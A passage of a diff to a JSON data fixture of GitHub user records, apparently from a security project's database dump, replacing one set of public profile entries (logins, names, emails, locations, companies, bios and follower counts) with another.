(federated) authentication platforms.", - "is_hireable": false, - "twitter_username": "" + "following_count": 10, + "followers_count": 20, + "public_gists_count": 0, + "public_repositories_count": 66, + "created_at": "2020-05-08T16:30:39Z", + "updated_at": "2024-08-23T16:49:40Z", + "node_id": "MDQ6VXNlcjY1MDM0Mjc2", + "bio": "A Computer Science Undergraduate.", + "is_hireable": true, + "twitter_username": "adityarrudra" } }, { "model": "github.user", - "pk": 2820, + "pk": 8183, "fields": { - "nest_created_at": "2024-09-12T02:27:22.651Z", - "nest_updated_at": "2024-09-12T02:27:22.651Z", - "name": "Vivek Panchal", - "login": "Vivekmauli14", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/83024029?v=4", - "company": "Veritawall Technologies", - "location": "Gurugram", + "nest_created_at": "2024-09-22T09:44:27.016Z", + "nest_updated_at": "2024-09-22T19:43:29.532Z", + "name": "The Gitter Badger", + "login": "gitter-badger", + "email": "badger@gitter.im", + "avatar_url": "https://avatars.githubusercontent.com/u/8518239?v=4", + "company": "Gitter", + "location": "Safe in the Gitter den", "collaborators_count": 0, - "following_count": 7, - "followers_count": 6, + "following_count": 0, + "followers_count": 553, "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2021-04-22T15:07:13Z", - "updated_at": "2024-08-08T12:46:40Z", - "node_id": "MDQ6VXNlcjgzMDI0MDI5", - "bio": "Software Developer and a problem solving enthusiast working in cybersecurity domain. I have completed my graduation in Electronics and Telecommunication.", + "public_repositories_count": 38286, + "created_at": "2014-08-21T22:34:39Z", + "updated_at": "2024-05-22T15:15:07Z", + "node_id": "MDQ6VXNlcjg1MTgyMzk=", + "bio": "", "is_hireable": false, - "twitter_username": "viveksp20000" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2821, + "pk": 8184, "fields": { - "nest_created_at": "2024-09-12T02:27:23.878Z", - "nest_updated_at": "2024-09-16T22:32:41.419Z", - "name": "Oleksandr Isniuk", - "login": "isniukArte", + "nest_created_at": "2024-09-22T09:44:27.333Z", + "nest_updated_at": "2024-09-22T19:43:29.869Z", + "name": "Travis Webb", + "login": "tjwebb", + "email": "me@traviswebb.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1009114?v=4", + "company": "@google @GoogleCloudPlatform ", + "location": "Norfolk, VA", + "collaborators_count": 0, + "following_count": 14, + "followers_count": 426, + "public_gists_count": 25, + "public_repositories_count": 173, + "created_at": "2011-08-27T21:52:58Z", + "updated_at": "2024-09-20T11:25:17Z", + "node_id": "MDQ6VXNlcjEwMDkxMTQ=", + "bio": "Solutions Architect @ Google", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 8185, + "fields": { + "nest_created_at": "2024-09-22T09:44:27.645Z", + "nest_updated_at": "2024-09-22T19:43:30.215Z", + "name": "", + "login": "zmackie", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/111287421?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5925347?v=4", "company": "", - "location": "Lviv, Ukraine", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2022-08-15T12:31:37Z", - "updated_at": "2023-08-30T17:14:17Z", - "node_id": "U_kgDOBqIcfQ", + "following_count": 44, + "followers_count": 21, + "public_gists_count": 18, + "public_repositories_count": 256, + "created_at": "2013-11-13T02:56:36Z", + "updated_at": "2024-08-03T12:16:47Z", + "node_id": "MDQ6VXNlcjU5MjUzNDc=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2822, + "pk": 8186, "fields": { - "nest_created_at": "2024-09-12T02:27:25.519Z", - "nest_updated_at": "2024-09-12T02:27:25.519Z", + "nest_created_at": "2024-09-22T09:44:28.391Z", + "nest_updated_at": "2024-09-22T19:43:30.853Z", "name": "", - "login": "louis07r", + "login": "battletux", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/61292384?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2396112?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2020-02-20T19:19:43Z", - "updated_at": "2024-07-22T07:03:31Z", - "node_id": "MDQ6VXNlcjYxMjkyMzg0", + "following_count": 4, + "followers_count": 9, + "public_gists_count": 1, + "public_repositories_count": 16, + "created_at": "2012-09-21T20:54:22Z", + "updated_at": "2024-04-12T21:22:18Z", + "node_id": "MDQ6VXNlcjIzOTYxMTI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -430803,74 +690577,74 @@ }, { "model": "github.user", - "pk": 2823, + "pk": 8187, "fields": { - "nest_created_at": "2024-09-12T02:27:31.716Z", - "nest_updated_at": "2024-09-12T02:27:31.716Z", - "name": "", - "login": "aryehb", + "nest_created_at": "2024-09-22T09:44:28.703Z", + "nest_updated_at": "2024-09-22T19:43:31.189Z", + "name": "Jamie McGregor", + "login": "jamiemcgregor", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/49538279?v=4", - "company": "accept.blue", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9799377?v=4", + "company": "", + "location": "Newcastle upon Tyne, England", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2019-04-11T22:07:28Z", - "updated_at": "2024-07-23T18:56:01Z", - "node_id": "MDQ6VXNlcjQ5NTM4Mjc5", - "bio": "", + "public_repositories_count": 1, + "created_at": "2014-11-17T10:00:01Z", + "updated_at": "2021-12-16T16:54:18Z", + "node_id": "MDQ6VXNlcjk3OTkzNzc=", + "bio": "breaker of stuff", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2824, + "pk": 8188, "fields": { - "nest_created_at": "2024-09-12T02:27:32.966Z", - "nest_updated_at": "2024-09-18T00:21:43.998Z", - "name": "Dan Ran", - "login": "Danrancan", - "email": "dan@danran.rocks", - "avatar_url": "https://avatars.githubusercontent.com/u/30222551?v=4", - "company": "danran.rocks", - "location": "Milwaukee, WI", + "nest_created_at": "2024-09-22T09:44:29.332Z", + "nest_updated_at": "2024-09-22T19:43:31.815Z", + "name": "Manabu Niseki", + "login": "ninoseki", + "email": "manabu.niseki@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/291028?v=4", + "company": "", + "location": "Japan", "collaborators_count": 0, - "following_count": 21, - "followers_count": 7, - "public_gists_count": 2, - "public_repositories_count": 15, - "created_at": "2017-07-17T02:35:34Z", - "updated_at": "2024-08-31T03:38:32Z", - "node_id": "MDQ6VXNlcjMwMjIyNTUx", - "bio": "Accountant/DJ/Nerd/Apple Fanboy/Tinkerer/Event Producer/Operating System Enthusiast and explorer, Writer & Blogger @nerd-tech & www.danran.rocks", - "is_hireable": true, - "twitter_username": "DanRanOfficial" + "following_count": 150, + "followers_count": 465, + "public_gists_count": 78, + "public_repositories_count": 305, + "created_at": "2010-05-29T23:32:44Z", + "updated_at": "2024-08-27T02:07:34Z", + "node_id": "MDQ6VXNlcjI5MTAyOA==", + "bio": "I have no idea what I’m doing.", + "is_hireable": false, + "twitter_username": "ninoseki" } }, { "model": "github.user", - "pk": 2825, + "pk": 8189, "fields": { - "nest_created_at": "2024-09-12T02:27:34.245Z", - "nest_updated_at": "2024-09-16T22:32:42.750Z", + "nest_created_at": "2024-09-22T09:44:29.677Z", + "nest_updated_at": "2024-09-22T19:43:32.124Z", "name": "", - "login": "netcedec", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/150895654?v=4", + "login": "ridhishjain", + "email": "ultimate.ridhish@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/181664805?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 3, + "following_count": 0, "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 0, - "created_at": "2023-11-15T07:44:09Z", - "updated_at": "2024-06-22T14:41:09Z", - "node_id": "U_kgDOCP58Jg", + "created_at": "2024-09-15T18:22:51Z", + "updated_at": "2024-09-15T18:24:58Z", + "node_id": "U_kgDOCtP8JQ", "bio": "", "is_hireable": false, "twitter_username": "" @@ -430878,99 +690652,149 @@ }, { "model": "github.user", - "pk": 2826, + "pk": 8190, "fields": { - "nest_created_at": "2024-09-12T02:27:39.274Z", - "nest_updated_at": "2024-09-12T02:27:39.274Z", - "name": "Puvipavan", - "login": "Puvipavan", + "nest_created_at": "2024-09-22T09:44:29.983Z", + "nest_updated_at": "2024-09-22T19:43:32.497Z", + "name": "", + "login": "sourcecodereviewer", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/14966528?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/111017510?v=4", "company": "", - "location": "Trincomalee, Sri Lanka", + "location": "", "collaborators_count": 0, - "following_count": 6, - "followers_count": 12, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 20, - "created_at": "2015-10-04T17:48:49Z", - "updated_at": "2024-08-09T11:49:54Z", - "node_id": "MDQ6VXNlcjE0OTY2NTI4", - "bio": "F1nD1nG Th3 An5w3r5 0f S3cR3t5", + "public_repositories_count": 2, + "created_at": "2022-08-10T20:20:19Z", + "updated_at": "2024-09-17T12:05:07Z", + "node_id": "U_kgDOBp3-Jg", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2827, + "pk": 8191, "fields": { - "nest_created_at": "2024-09-12T02:28:06.433Z", - "nest_updated_at": "2024-09-12T02:28:06.433Z", - "name": "Captain T", - "login": "Captainzalad", + "nest_created_at": "2024-09-22T09:44:30.310Z", + "nest_updated_at": "2024-09-22T19:43:32.809Z", + "name": "", + "login": "timmar2000", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/64754753?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/43504783?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 1, "public_gists_count": 0, "public_repositories_count": 1, - "created_at": "2020-05-03T21:47:49Z", - "updated_at": "2021-12-21T22:39:02Z", - "node_id": "MDQ6VXNlcjY0NzU0NzUz", - "bio": "Just another free Repo", + "created_at": "2018-09-22T20:50:32Z", + "updated_at": "2024-09-22T12:00:00Z", + "node_id": "MDQ6VXNlcjQzNTA0Nzgz", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2828, + "pk": 8192, "fields": { - "nest_created_at": "2024-09-12T02:28:09.898Z", - "nest_updated_at": "2024-09-12T02:28:09.898Z", - "name": "Taavi Ansper", - "login": "TafkaMax", + "nest_created_at": "2024-09-22T09:44:30.627Z", + "nest_updated_at": "2024-09-22T19:43:33.119Z", + "name": "Abhishek bundela", + "login": "abhibundela", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/46354923?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/8913358?v=4", "company": "", - "location": "Estonia", + "location": "smvdu", "collaborators_count": 0, - "following_count": 7, - "followers_count": 2, + "following_count": 148, + "followers_count": 64, + "public_gists_count": 7, + "public_repositories_count": 29, + "created_at": "2014-09-25T10:11:20Z", + "updated_at": "2024-09-02T11:27:08Z", + "node_id": "MDQ6VXNlcjg5MTMzNTg=", + "bio": "Bughunter", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 8193, + "fields": { + "nest_created_at": "2024-09-22T09:44:30.934Z", + "nest_updated_at": "2024-09-22T19:43:33.432Z", + "name": "Achim Grimm", + "login": "achimgrimm", + "email": "achim.grimm@neuland-bfi.de", + "avatar_url": "https://avatars.githubusercontent.com/u/7899744?v=4", + "company": "neuland bremen GmbH", + "location": "Bremen, Germany", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 12, "public_gists_count": 0, - "public_repositories_count": 12, - "created_at": "2019-01-03T18:00:44Z", - "updated_at": "2024-09-04T00:07:09Z", - "node_id": "MDQ6VXNlcjQ2MzU0OTIz", - "bio": "Just a programmer.", + "public_repositories_count": 18, + "created_at": "2014-06-16T07:37:54Z", + "updated_at": "2024-06-17T08:33:06Z", + "node_id": "MDQ6VXNlcjc4OTk3NDQ=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2829, + "pk": 8194, "fields": { - "nest_created_at": "2024-09-12T02:28:11.564Z", - "nest_updated_at": "2024-09-12T02:28:11.564Z", - "name": "", - "login": "enibache", + "nest_created_at": "2024-09-22T09:44:31.252Z", + "nest_updated_at": "2024-09-22T19:43:33.767Z", + "name": "Alvaro Viebrantz", + "login": "alvarowolfx", + "email": "alvarowolfx@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1615543?v=4", + "company": "Google", + "location": "Cuiabá, MT, Brazil", + "collaborators_count": 0, + "following_count": 442, + "followers_count": 526, + "public_gists_count": 21, + "public_repositories_count": 161, + "created_at": "2012-04-05T13:37:47Z", + "updated_at": "2024-09-14T18:15:15Z", + "node_id": "MDQ6VXNlcjE2MTU1NDM=", + "bio": "Software Engineer @GoogleCloudPlatform and BigQuery", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 8195, + "fields": { + "nest_created_at": "2024-09-22T09:44:31.571Z", + "nest_updated_at": "2024-09-22T19:43:34.081Z", + "name": "Art", + "login": "awflwafl", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26222534?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/13058213?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 1, + "followers_count": 21, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2017-03-06T12:08:46Z", - "updated_at": "2023-11-22T17:13:56Z", - "node_id": "MDQ6VXNlcjI2MjIyNTM0", + "public_repositories_count": 7, + "created_at": "2015-06-26T02:18:51Z", + "updated_at": "2024-06-07T11:47:15Z", + "node_id": "MDQ6VXNlcjEzMDU4MjEz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -430978,74 +690802,74 @@ }, { "model": "github.user", - "pk": 2830, + "pk": 8196, "fields": { - "nest_created_at": "2024-09-12T02:28:15.790Z", - "nest_updated_at": "2024-09-12T02:28:15.790Z", - "name": "Daniel D'Angeli", - "login": "xBounceIT", + "nest_created_at": "2024-09-22T09:44:32.505Z", + "nest_updated_at": "2024-09-22T19:43:35.010Z", + "name": "Bitdeli Chef", + "login": "bitdeli-chef", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/35002896?v=4", - "company": "Sync Security S.r.l.", - "location": "Rome, Italy", + "avatar_url": "https://avatars.githubusercontent.com/u/3092978?v=4", + "company": "Bitdeli", + "location": "San Francisco,CA", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 145, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2018-01-01T14:12:56Z", - "updated_at": "2024-09-04T14:29:32Z", - "node_id": "MDQ6VXNlcjM1MDAyODk2", - "bio": "Cyber Security Analyst / Junior Programmer", + "public_repositories_count": 42, + "created_at": "2012-12-20T21:05:46Z", + "updated_at": "2017-08-14T19:41:39Z", + "node_id": "MDQ6VXNlcjMwOTI5Nzg=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2831, + "pk": 8197, "fields": { - "nest_created_at": "2024-09-12T02:28:22.994Z", - "nest_updated_at": "2024-09-18T19:10:31.720Z", - "name": "Doukkalli", - "login": "aramrami", - "email": "azzeddine.ramrami@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/225552?v=4", - "company": "@Accenture Security", - "location": "", + "nest_created_at": "2024-09-22T09:44:32.824Z", + "nest_updated_at": "2024-09-22T19:43:35.329Z", + "name": "Christian Kühn", + "login": "cy4n", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1135762?v=4", + "company": "", + "location": "Karlsruhe, Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 31, - "public_gists_count": 4, - "public_repositories_count": 563, - "created_at": "2010-03-18T18:21:17Z", - "updated_at": "2024-08-31T16:38:39Z", - "node_id": "MDQ6VXNlcjIyNTU1Mg==", - "bio": "Accenture Security, Senior Security Manager and Security Architect\r\nOT/IoT Security, SCADA/ICS, NextGen SOC, AppSec, DevSecOPS, Hardware Security SME ", + "following_count": 5, + "followers_count": 19, + "public_gists_count": 10, + "public_repositories_count": 90, + "created_at": "2011-10-18T13:22:54Z", + "updated_at": "2024-06-25T11:17:05Z", + "node_id": "MDQ6VXNlcjExMzU3NjI=", + "bio": "🐘 @cy@chaos.social", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2832, + "pk": 8198, "fields": { - "nest_created_at": "2024-09-12T02:28:32.167Z", - "nest_updated_at": "2024-09-12T02:28:32.167Z", - "name": "", - "login": "dp-anto", + "nest_created_at": "2024-09-22T09:44:33.454Z", + "nest_updated_at": "2024-09-22T19:43:35.945Z", + "name": "Gorka Vicente", + "login": "gorkavicente", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/72495351?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1144953?v=4", + "company": "Datadog", + "location": "San Sebastián", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 7, + "followers_count": 4, "public_gists_count": 0, "public_repositories_count": 2, - "created_at": "2020-10-07T09:11:55Z", - "updated_at": "2022-09-06T20:04:10Z", - "node_id": "MDQ6VXNlcjcyNDk1MzUx", + "created_at": "2011-10-22T13:08:28Z", + "updated_at": "2024-08-12T08:57:46Z", + "node_id": "MDQ6VXNlcjExNDQ5NTM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -431053,74 +690877,99 @@ }, { "model": "github.user", - "pk": 2833, + "pk": 8199, "fields": { - "nest_created_at": "2024-09-12T02:28:36.306Z", - "nest_updated_at": "2024-09-17T23:26:08.186Z", - "name": "Jake Karnes", - "login": "jakekarnes42", - "email": "jake.karnes@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/3769323?v=4", - "company": "NetSPI", + "nest_created_at": "2024-09-22T09:44:33.766Z", + "nest_updated_at": "2024-09-22T19:43:36.252Z", + "name": "Jainendra Mandavi", + "login": "jainendra", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1728957?v=4", + "company": "Headout", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 23, - "public_gists_count": 13, - "public_repositories_count": 13, - "created_at": "2013-03-04T21:39:33Z", - "updated_at": "2024-07-11T18:13:00Z", - "node_id": "MDQ6VXNlcjM3NjkzMjM=", - "bio": "", + "following_count": 16, + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2012-05-11T04:52:12Z", + "updated_at": "2024-04-29T06:22:06Z", + "node_id": "MDQ6VXNlcjE3Mjg5NTc=", + "bio": "Engineering @ Headout", "is_hireable": false, - "twitter_username": "" + "twitter_username": "jai4man" } }, { "model": "github.user", - "pk": 2834, + "pk": 8200, "fields": { - "nest_created_at": "2024-09-12T02:28:39.169Z", - "nest_updated_at": "2024-09-18T19:10:41.135Z", - "name": "OWASP WebGoat", - "login": "WebGoat", - "email": "webgoat@owasp.org", - "avatar_url": "https://avatars.githubusercontent.com/u/7718244?v=4", - "company": "", + "nest_created_at": "2024-09-22T09:44:34.083Z", + "nest_updated_at": "2024-09-22T19:43:36.588Z", + "name": "Jason Haley", + "login": "JasonHaley", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4291604?v=4", + "company": "Jason Haley Consulting LLC", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 169, + "following_count": 3, + "followers_count": 31, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2014-05-27T22:16:44Z", - "updated_at": "2023-03-24T17:34:41Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjc3MTgyNDQ=", - "bio": "Deliberately insecure JavaEE application to teach application security", + "public_repositories_count": 69, + "created_at": "2013-04-29T13:26:06Z", + "updated_at": "2024-09-21T18:55:01Z", + "node_id": "MDQ6VXNlcjQyOTE2MDQ=", + "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "haleyjason" } }, { "model": "github.user", - "pk": 2835, + "pk": 8201, "fields": { - "nest_created_at": "2024-09-12T02:28:45.038Z", - "nest_updated_at": "2024-09-12T02:28:45.038Z", + "nest_created_at": "2024-09-22T09:44:35.737Z", + "nest_updated_at": "2024-09-22T19:43:38.256Z", + "name": "Ken Friis Larsen", + "login": "kfl", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/44830?v=4", + "company": "Department of Computer Science, University of Copenhagen @diku-dk ", + "location": "Copenhagen", + "collaborators_count": 0, + "following_count": 49, + "followers_count": 139, + "public_gists_count": 23, + "public_repositories_count": 64, + "created_at": "2009-01-07T12:42:30Z", + "updated_at": "2024-08-24T03:33:10Z", + "node_id": "MDQ6VXNlcjQ0ODMw", + "bio": "Renaissance Computer Scientist.", + "is_hireable": false, + "twitter_username": "bongoband" + } +}, +{ + "model": "github.user", + "pk": 8202, + "fields": { + "nest_created_at": "2024-09-22T09:44:36.407Z", + "nest_updated_at": "2024-09-22T19:43:38.894Z", "name": "", - "login": "ChanduMeenavalli", + "login": "M4ttsson", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/22357524?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/14147055?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 1, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2016-09-21T22:48:17Z", - "updated_at": "2020-08-19T19:14:40Z", - "node_id": "MDQ6VXNlcjIyMzU3NTI0", + "public_repositories_count": 15, + "created_at": "2015-09-06T08:31:42Z", + "updated_at": "2024-09-09T09:13:31Z", + "node_id": "MDQ6VXNlcjE0MTQ3MDU1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -431128,49 +690977,49 @@ }, { "model": "github.user", - "pk": 2836, + "pk": 8203, "fields": { - "nest_created_at": "2024-09-12T02:28:47.503Z", - "nest_updated_at": "2024-09-12T02:28:47.503Z", - "name": "Nicolai Nielsen", - "login": "dovecode", + "nest_created_at": "2024-09-22T09:44:36.722Z", + "nest_updated_at": "2024-09-22T19:43:39.208Z", + "name": "Manan Garg", + "login": "Coder-Manan", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16987409?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/92792271?v=4", + "company": "IIT Roorkee", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 5, + "followers_count": 17, "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2016-01-31T15:12:48Z", - "updated_at": "2024-09-12T00:30:13Z", - "node_id": "MDQ6VXNlcjE2OTg3NDA5", - "bio": "", + "public_repositories_count": 20, + "created_at": "2021-10-19T11:06:11Z", + "updated_at": "2024-09-22T03:21:43Z", + "node_id": "U_kgDOBYflzw", + "bio": "Developer @mdgspace ||\r\nCTF player @InfoSecIITR ||\r\nCS Undergrad @IITR ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2837, + "pk": 8204, "fields": { - "nest_created_at": "2024-09-12T02:28:51.705Z", - "nest_updated_at": "2024-09-12T02:28:58.490Z", - "name": "Àngel Ollé Blázquez", - "login": "aolle", + "nest_created_at": "2024-09-22T09:44:37.032Z", + "nest_updated_at": "2024-09-22T19:43:39.525Z", + "name": "Mashiro Shiina", + "login": "AngelMashiro", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12197954?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/33735917?v=4", "company": "", - "location": "Barcelona, Spain", + "location": "Okinawa, Japan", "collaborators_count": 0, - "following_count": 69, - "followers_count": 30, - "public_gists_count": 22, - "public_repositories_count": 22, - "created_at": "2015-05-01T11:11:04Z", - "updated_at": "2024-08-29T10:06:16Z", - "node_id": "MDQ6VXNlcjEyMTk3OTU0", + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2017-11-16T22:09:36Z", + "updated_at": "2024-07-27T14:23:18Z", + "node_id": "MDQ6VXNlcjMzNzM1OTE3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -431178,74 +691027,74 @@ }, { "model": "github.user", - "pk": 2838, + "pk": 8205, "fields": { - "nest_created_at": "2024-09-12T02:29:00.981Z", - "nest_updated_at": "2024-09-12T02:29:00.981Z", - "name": "Yandrew", - "login": "allblueee", + "nest_created_at": "2024-09-22T09:44:37.368Z", + "nest_updated_at": "2024-09-22T19:43:39.842Z", + "name": "Patrick J Gallagher", + "login": "pattyjogal", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/95740379?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/13685040?v=4", "company": "", - "location": "laughtale", + "location": "Chicago, IL", "collaborators_count": 0, - "following_count": 37, - "followers_count": 4, - "public_gists_count": 0, - "public_repositories_count": 24, - "created_at": "2021-12-08T07:23:20Z", - "updated_at": "2024-09-08T07:09:31Z", - "node_id": "U_kgDOBbTh2w", - "bio": "", + "following_count": 21, + "followers_count": 21, + "public_gists_count": 2, + "public_repositories_count": 53, + "created_at": "2015-08-06T21:22:55Z", + "updated_at": "2024-07-29T18:58:56Z", + "node_id": "MDQ6VXNlcjEzNjg1MDQw", + "bio": "UIUC '21\r\nB.S. in Computer Science", "is_hireable": false, - "twitter_username": "" + "twitter_username": "pattyjogal" } }, { "model": "github.user", - "pk": 2839, + "pk": 8206, "fields": { - "nest_created_at": "2024-09-12T02:29:12.768Z", - "nest_updated_at": "2024-09-12T02:29:12.768Z", - "name": "DoI", - "login": "denandz", + "nest_created_at": "2024-09-22T09:44:43.282Z", + "nest_updated_at": "2024-09-22T19:43:45.839Z", + "name": "ElJeffe", + "login": "eljeffeg", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5291556?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/161904?v=4", "company": "", - "location": "Auckland, New Zealand", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 176, - "public_gists_count": 3, - "public_repositories_count": 27, - "created_at": "2013-08-23T02:37:21Z", - "updated_at": "2024-06-01T05:34:04Z", - "node_id": "MDQ6VXNlcjUyOTE1NTY=", + "following_count": 21, + "followers_count": 46, + "public_gists_count": 1, + "public_repositories_count": 47, + "created_at": "2009-12-04T13:46:08Z", + "updated_at": "2024-08-21T21:51:11Z", + "node_id": "MDQ6VXNlcjE2MTkwNA==", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "eljeffeg" } }, { "model": "github.user", - "pk": 2840, + "pk": 8207, "fields": { - "nest_created_at": "2024-09-12T02:29:13.583Z", - "nest_updated_at": "2024-09-12T02:29:13.583Z", - "name": "", - "login": "shiva-art", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/71481826?v=4", + "nest_created_at": "2024-09-22T09:44:43.604Z", + "nest_updated_at": "2024-09-22T19:43:46.159Z", + "name": "Jamie McCrindle", + "login": "jamiemccrindle", + "email": "jamiemccrindle@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/909696?v=4", "company": "", - "location": "", + "location": "London", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 26, - "created_at": "2020-09-18T04:31:45Z", - "updated_at": "2024-08-28T06:16:12Z", - "node_id": "MDQ6VXNlcjcxNDgxODI2", + "following_count": 6, + "followers_count": 50, + "public_gists_count": 1, + "public_repositories_count": 43, + "created_at": "2011-07-12T08:06:48Z", + "updated_at": "2024-08-26T11:23:13Z", + "node_id": "MDQ6VXNlcjkwOTY5Ng==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -431253,49 +691102,49 @@ }, { "model": "github.user", - "pk": 2841, + "pk": 8208, "fields": { - "nest_created_at": "2024-09-12T02:29:13.988Z", - "nest_updated_at": "2024-09-12T02:29:13.988Z", - "name": "René Zubcevic", - "login": "zubcevic", + "nest_created_at": "2024-09-22T09:44:50.410Z", + "nest_updated_at": "2024-09-22T19:43:52.978Z", + "name": "Michael Eischer", + "login": "MichaelEischer", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7931455?v=4", - "company": "Zubcevic.com IT consultancy & engineering", - "location": "The Netherlands", + "avatar_url": "https://avatars.githubusercontent.com/u/9106997?v=4", + "company": "", + "location": "Erlangen, Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 14, - "public_gists_count": 0, - "public_repositories_count": 35, - "created_at": "2014-06-19T08:21:22Z", - "updated_at": "2024-05-28T15:58:18Z", - "node_id": "MDQ6VXNlcjc5MzE0NTU=", - "bio": "Freelance IT solution engineer and allround expert on application development, information security, deployment automation and performance tuning", + "following_count": 1, + "followers_count": 49, + "public_gists_count": 1, + "public_repositories_count": 20, + "created_at": "2014-10-09T09:17:09Z", + "updated_at": "2024-09-05T07:56:49Z", + "node_id": "MDQ6VXNlcjkxMDY5OTc=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2842, + "pk": 8209, "fields": { - "nest_created_at": "2024-09-12T02:29:15.218Z", - "nest_updated_at": "2024-09-12T02:29:15.218Z", - "name": "Tsugumi", - "login": "NightfoxHS", + "nest_created_at": "2024-09-22T09:44:50.720Z", + "nest_updated_at": "2024-09-22T19:43:53.290Z", + "name": "Jonasbg", + "login": "jonasbg", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10007368?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1508560?v=4", + "company": "@NorskHelsenett ", "location": "", "collaborators_count": 0, 